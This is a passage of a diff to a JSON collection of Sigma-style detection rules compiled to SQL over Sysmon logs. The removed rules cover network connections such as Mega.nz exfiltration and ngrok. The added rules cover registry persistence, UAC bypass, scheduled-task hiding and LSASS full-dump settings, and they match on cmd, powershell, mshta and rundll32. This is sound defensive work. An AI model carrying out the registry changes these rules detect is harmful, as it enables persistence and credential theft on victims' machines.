ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Disk Cleanup Handler - Autorun", + "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (Details LIKE '%cmd%' ESCAPE '\\' OR Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%wsl%' ESCAPE '\\' OR Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" }, { - "title": "Dllhost Internet Connection", - "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", "status": "test", - "description": "Detects Dllhost that communicates with public IP addresses", - "author": "bartblaze", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_dllhost_net_connections.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Script Initiated Connection", - "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", - "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "title": "Registry Modification to Hidden File Extension", + "id": "5df86130-4e95-4a54-90f7-26541b40aec2", + "status": "test", + "description": "Hides the file extension through modification of the registry", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate scripts" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND Details = 'DWORD (0x00000002)')))" ], - "filename": "net_connection_win_script.yml" + "filename": "registry_set_hidden_extention.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_set_comhijack_sdclt.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Potential Persistence Via Visual Studio Tools for Office", - "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "status": "experimental", - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "author": "Bhabesh Raj", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1137.006", - "attack.persistence" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate Addin Installation" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\integrator.exe' ESCAPE '\\' OR Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_persistence_office_vsto.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Wow6432Node CurrentVersion Autorun Keys Modification", - "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "title": "Enable Local Manifest Installation With Winget", + "id": "fa277e82-9b78-42dd-b05c-05555c7b6015", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Administrators or developers might enable this for testing purposes or to install custom private packages" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND Image LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (Details LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR Details = 'grpconv -o' OR Details LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND Details LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND Details LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (Image LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND Details LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR Image LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND Details LIKE '% /burn.runonce' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\AppInstaller\\\\EnableLocalManifestFiles' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" + "filename": "registry_set_winget_enable_local_manifest.yml" }, { - "title": "Outlook Security Settings Updated - Registry", - "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects changes to the registry values related to outlook security settings", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", "author": "frack113", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1547.010" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" ], - "filename": "registry_set_office_outlook_security_settings.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "title": "Classes Autorun Keys Modification", + "id": "9df5f547-c86a-433e-b533-f2794357e242", "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ "attack.persistence", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject 